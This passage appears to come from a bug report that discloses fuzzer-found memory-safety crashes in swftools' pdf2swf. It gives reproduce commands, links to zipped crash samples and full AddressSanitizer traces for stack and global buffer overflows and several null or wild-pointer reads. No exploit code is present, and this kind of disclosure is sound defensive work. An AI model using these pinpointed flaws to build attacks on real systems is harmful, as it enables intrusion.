Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==8869==ABORTING ``` -------------------------------------- ## stack_buffer_overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id100_stack_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034360/id100_stack_buffer_overflow.zip) ### crash info ``` ==43189==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe33ffbdc4 at pc 0x00000060df33 bp 0x7ffe33ffbc50 sp 0x7ffe33ffbc48 WRITE of size 1 at 0x7ffe33ffbdc4 thread T0 #0 0x60df32 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:348:12 #1 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #2 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #3 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #4 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #5 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #6 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #7 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #8 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #9 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #10 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #11 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #12 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #13 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #14 0x7f6be3d6fc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #15 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) Address 0x7ffe33ffbdc4 is located in stack of thread T0 at offset 292 in frame #0 0x7c774f in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1127 This frame has 19 object(s): [32, 40) 'x1' (line 1130) [64, 72) 'y1' (line 1130) [96, 104) 'x2' (line 1130) [128, 136) 'y2' (line 1130) [160, 168) 'x3' (line 1130) [192, 200) 'y3' (line 1130) [224, 232) 'x4' (line 1130) [256, 264) 'y4' (line 1130) [288, 292) 'pixBuf' (line 1132) <== Memory access at offset 292 overflows this variable [304, 316) 'rgb' (line 1133) [336, 416) 'color_transform' (line 1137) [448, 456) 'buf' (line 1146) [480, 736) 'pal' (line 1151) [800, 804) 'gray' (line 1155) [816, 824) 'buf94' (line 1188) [848, 856) 'buf173' (line 1228) [880, 1904) 'pal179' (line 1231) [2032, 2044) 'rgb180' (line 1232) [2064, 3088) 'pal486' (line 1340) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:348:12 in ImageStream::getPixel(unsigned char*) Shadow bytes around the buggy address: 0x1000467f7760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000467f7770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000467f7780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000467f7790: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 0x1000467f77a0: 00 f2 f2 f2 00 f2 f2 f2 00 f2 f2 f2 00 f2 f2 f2 =>0x1000467f77b0: 00 f2 f2 f2 00 f2 f2 f2[04]f2 00 04 f2 f2 00 00 0x1000467f77c0: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f8 f2 f2 f2 0x1000467f77d0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x1000467f77e0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x1000467f77f0: f2 f2 f2 f2 f2 f2 f2 f2 f8 f2 f8 f2 f2 f2 f8 f2 0x1000467f7800: f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==43189==ABORTING ``` -------------------------------------- ## global-buffer-overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id7_global_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034361/id7_global_buffer_overflow.zip) ### crash info ``` ==71185==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000001818502 at pc 0x00000063a7bf bp 0x7ffe36636f40 sp 0x7ffe36636f38 READ of size 1 at 0x000001818502 thread T0 #0 0x63a7be in DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2804:18 #1 0x634382 in DCTStream::readMCURow() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2135:4 #2 0x632e98 in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2040:12 #3 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #4 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #5 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #6 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #7 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #8 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #9 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #10 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #11 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #12 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #13 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #14 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #15 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #16 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #17 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #18 0x7f2cb74a3c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #19 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x000001818502 is located 30 bytes to the left of global variable 'zoomtowidth' defined in 'pdf.cc:26:12' (0x1818520) of size 4 0x000001818502 is located 30 bytes to the right of global variable 'threadsafe' defined in 'pdf.cc:29:12' (0x18184e0) of size 4 SUMMARY: AddressSanitizer: global-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2804:18 in DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) Shadow bytes around the buggy address: 0x0000802fb050: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802fb060: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802fb070: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802fb080: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x0000802fb090: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 =>0x0000802fb0a0:[f9]f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 0x0000802fb0b0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802fb0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==71185==ABORTING ``` ------------------------------ ## SEGV ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id0_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034362/id0_SEGV.zip) ### crash info ``` Error: PDF file is damaged - attempting to reconstruct xref table... AddressSanitizer:DEADLYSIGNAL ==71049==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x0000008293e7 bp 0x7ffe8c3e6990 sp 0x7ffe8c3e6700 T0) ==71049==The signal is caused by a READ memory access. ==71049==Hint: address points to the zero page. #0 0x8293e7 in FoFiTrueType::writeTTF(void (*)(void*, char*, int), void*, char*, unsigned short*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:910:24 #1 0x8d28a9 in SplashFTFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFTFontEngine.cc:160:7 #2 0x8c1fa5 in SplashFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFontEngine.cc:255:26 #3 0x88430a in SplashOutputDev::doUpdateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashOutputDev.cc:1130:36 #4 0x8060a8 in InfoOutputDev::updateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:577:13 #5 0x6f27c5 in Gfx::opShowText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3038:10 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #13 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #14 0x7f971e94dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #15 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:910:24 in FoFiTrueType::writeTTF(void (*)(void*, char*, int), void*, char*, unsigned short*) ==71049==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id76_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034364/id76_SEGV.zip) ### crash info ``` ==41269==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000091bf07 bp 0x7fff9910e150 sp 0x7fff9910dfa0 T0) ==41269==The signal is caused by a READ memory access. ==41269==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x91bf07 in convert_gfxline /home/bupt/Desktop/swftools/lib/gfxpoly/convert.c:31:18 #1 0x91bf07 in gfxpoly_from_fill /home/bupt/Desktop/swftools/lib/gfxpoly/convert.c:250:5 #2 0x90a161 in polyops_fill /home/bupt/Desktop/swftools/lib/devices/polyops.c:247:22 #3 0x7c3e1b in VectorGraphicOutputDev::fillGfxLine(GfxState*, _gfxline*, char) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:627:5 #4 0x7c3e1b in VectorGraphicOutputDev::endString(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:805:6 #5 0x71bb67 in Gfx::doShowText(GString*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3300:10 #6 0x6f28e5 in Gfx::opShowText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3042:3 #7 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #8 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #9 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #10 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #11 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #12 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #13 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #14 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #15 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #16 0x7fa199df7c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/gfxpoly/convert.c:31:18 in convert_gfxline ==41269==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id87_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034365/id87_SEGV.zip) ### crash info ``` ==41858==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000008e4b57 bp 0x7ffe72186f50 sp 0x7ffe72186e20 T0) ==41858==The signal is caused by a READ memory access. ==41858==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x8e4b57 in gfxline_getbbox /home/bupt/Desktop/swftools/lib/gfxtools.c:765:11 #1 0x7c200e in VectorGraphicOutputDev::clipToGfxLine(GfxState*, _gfxline*, char) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:636:22 #2 0x7c439f in VectorGraphicOutputDev::endTextObject(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:829:2 #3 0x6ed08a in Gfx::opEndText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:2931:8 #4 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #5 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #6 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #7 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #8 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #9 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #10 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #11 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #12 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #13 0x7fa23073cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #14 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/gfxtools.c:765:11 in gfxline_getbbox ==41858==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id177_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034366/id177_SEGV.zip) ### crash info ``` ==51127==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7f36c6dc2eeb bp 0x7ffe41030f10 sp 0x7ffe410306a8 T0) ==51127==The signal is caused by a WRITE memory access. ==51127==Hint: address points to the zero page. #0 0x7f36c6dc2eeb /build/glibc-CVJwZb/glibc-2.27/string/../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:253 #1 0x4b226b in __asan_memset /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:26 #2 0x80ac4a in InfoOutputDev::type3D0(GfxState*, double, double) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:880:21 #3 0x6f686b in Gfx::opSetCharWidth(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3964:8 #4 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #5 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #6 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #7 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #8 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #9 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #10 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #11 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #12 0x7f36c6c55c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #13 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/string/../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:253 ==51127==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id247_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034368/id247_SEGV.zip) ### crash info ``` ==55626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x00000080ad10 bp 0x000000e54600 sp 0x7fff3c224a00 T0) ==55626==The signal is caused by a READ memory access. ==55626==Hint: address points to the zero page. #0 0x80ad10 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 #1 0x6f6ca3 in Gfx::opSetCacheDevice(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3968:8 #2 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #3 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #4 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #5 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #6 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #7 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #8 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #9 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #10 0x7f38f630bc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) ==55626==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id299_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034500/id299_SEGV.zip) ### crash info ``` ==102977==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x00000080ad10 bp 0x000000e54600 sp 0x7ffde73e8d00 T0) ==102977==The signal is caused by a READ memory access. ==102977==Hint: address points to the zero page. #0 0x80ad10 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 #1 0x6f6ca3 in Gfx::opSetCacheDevice(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3968:8 #2 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #3 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #4 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #5 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #6 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #7 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #8 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #9 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #10 0x7f93e149ec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:887:12 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) ==102977==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id359_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034803/id359_SEGV.zip) ### crash info ``` ==64656==ERROR: AddressSanitizer: SEGV on unknown address 0x62703a2bdf6f (pc 0x00000082c60e bp 0x7fff6931f990 sp 0x7fff6931f700 T0) ==64656==The signal is caused by a READ memory access. #0 0x82c60e in FoFiTrueType::computeTableChecksum(unsigned char*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:1776:14 #1 0x82c60e in FoFiTrueType::writeTTF(void (*)(void*, char*, int), void*, char*, unsigned short*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:1146:6 #2 0x8d28a9 in SplashFTFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFTFontEngine.cc:160:7 #3 0x8c1fa5 in SplashFontEngine::loadTrueTypeFont(SplashFontFileID*, char*, int, unsigned short*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashFontEngine.cc:255:26 #4 0x88430a in SplashOutputDev::doUpdateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/SplashOutputDev.cc:1130:36 #5 0x8060a8 in InfoOutputDev::updateFont(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/InfoOutputDev.cc:577:13 #6 0x6f27c5 in Gfx::opShowText(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3038:10 #7 0x705f02 in 